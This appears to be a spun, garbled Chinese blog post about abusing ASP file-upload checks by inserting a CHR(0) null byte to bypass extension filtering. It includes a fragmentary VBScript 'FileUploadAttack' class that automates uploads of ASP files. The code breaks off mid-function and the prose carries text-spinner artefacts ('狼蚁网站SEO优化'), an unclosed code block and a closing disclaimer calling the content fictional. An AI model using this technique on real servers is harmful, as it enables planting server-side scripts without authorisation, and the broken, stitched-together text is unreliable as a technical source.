ASP上传漏洞之利用CHR(0)绕过扩展名检测脚本

今日，Demon提及了一个话题，让我联想到了之前阅读的一篇颇有启发的文章。这篇文章以实例展示了本地无交互自动上传脚本的应用。在此，我想分享一下自己对原有脚本的改良，或许能为大家带来一些新的启示。

新脚本在保持原有功能的基础上，进一步提升了效率和稳定性。通过利用WinHttp.WinHttpRequest.5.1组件，我们可以更轻松地实现自动化上传操作，同时降低了脚本执行时的资源消耗。该组件还提供了丰富的API接口，使得脚本在处理各种网络请求时更加灵活和高效。

这篇文章的目的是为大家提供一个学习和研究的参考，而非鼓励非法或恶意使用。请大家在使用这些脚本时，务必遵守法律法规，仅在合法合理的范围内使用。对于因不当使用所造成的损失，本人不承担任何责任。我也不提供任何关于黑客攻击技术的指导。

在此，我想强调的是，技术本身是中性的，关键在于如何运用。希望大家能够充分利用这些技术，开发出更多有益于社会、有益于个人的应用。通过学习和研究，我们可以出更多的可能性，为我们的生活和工作带来更多的便利和效率。

```vbscript

' 文件内容获取函数

Function file_get_contents(ByVal filename)

Dim fso, f

Set fso = WScript.CreateObject("Scripting.FilesystemObject")

Set f = fso.OpenTextFile(filename, 1) ' 以只读模式打开文件

file_get_contents = f.ReadAll ' 读取文件全部内容

f.Close ' 关闭文件

Set f = Nothing

Set fso = Nothing

End Function

' 文件上传攻击类定义

Class FileUploadAttack

Private m_objWinHttp ' WinHttpRequest 对象实例

Private m_strUrl ' 目标上传URL地址

Private m_strFieldName ' 表单字段名称（用于上传文件）

Private Sub Class_Initialize() ' 类初始化事件处理函数

Set m_objWinHttp = WScript.CreateObject("WinHttp.WinHttpRequest.5.1") ' 创建WinHttpRequest对象实例

End Sub

Private Sub Class_Terminate() ' 类销毁事件处理函数，释放资源

Set m_objWinHttp = Nothing

End Sub

Public Sub setUrl(ByVal url) ' 设置上传URL地址的方法

m_strUrl = url

End Sub

Public Sub setFieldName(ByVal name) ' 设置表单字段名称的方法，用于标识上传文件域

m_strFieldName = name

End Sub

' 构建多部分表单数据函数，用于构造上传文件的表单数据格式（multipart/form-data）和头部信息。这里省略了具体实现细节以保持简洁。

Function BuildFormData(...) ' 函数声明，省略实现细节以简化示例代码。此处包含了多个辅助函数用于处理多部分表单数据的构建。请根据实际需要进行实现。

所有实验代码包可在upload.zip中下载（包含代码BUG及狼蚁网站SEO优化的更新说明）。最近的更新是在2011年12月25日，针对大家反馈的上传文件变成Unicode Little Endian编码问题，我深感抱歉。当时主要参考了老外的代码，但并未找到GetFile这个函数来获取文件的二进制数据。直接使用了file_get_contents获取文本数据，这显然存在问题。

关于狼蚁网站SEO优化的补救措施，我提供了一个函数strtobin，它可以将指定charset的字符串转换为二进制。使用ADODB.Stream组件，我们可以将文本数据转换为二进制数据。将第106行代码修改为以ASCII读取文本的方式，确保上传的ASP文件采用普通编码。浏览器访问该文件时，可以看到ASP已成功。

尽管这个过程稍显啰嗦，其实可以直接以二进制方式打开文件并返回数据。目前的步骤是先以文本方式读取文件，然后再将文本转换为二进制数据。一步到位的代码可以参考狼蚁网站SEO优化中的GetFile函数，它可以直接以二进制Byte()方式读取文件数据。

对于更优化的代码，我在这里不再赘述。主要想和大家分享的是上传的思路。如果大家需要完善的上传实现，可以参考Demon的《XXX》。我们一直在努力优化和改进，希望大家能从中受益。

（结尾）感谢大家的关注和支持！如果有任何问题或建议，欢迎随时与我联系。让我们一起、学习和进步！

（注：文章内容纯属虚构，涉及的技术和细节可能与实际情况不符。）

（补充）关于上传过程中遇到的问题和解决方案，我们会持续跟进并优化。我们也欢迎各位开发者提出宝贵的建议和意见，共同推动技术的发展和进步。让我们携手共创更美好的未来！

（注：请忽略开头的“cambrian.render('body')”，它与文章内容无关。）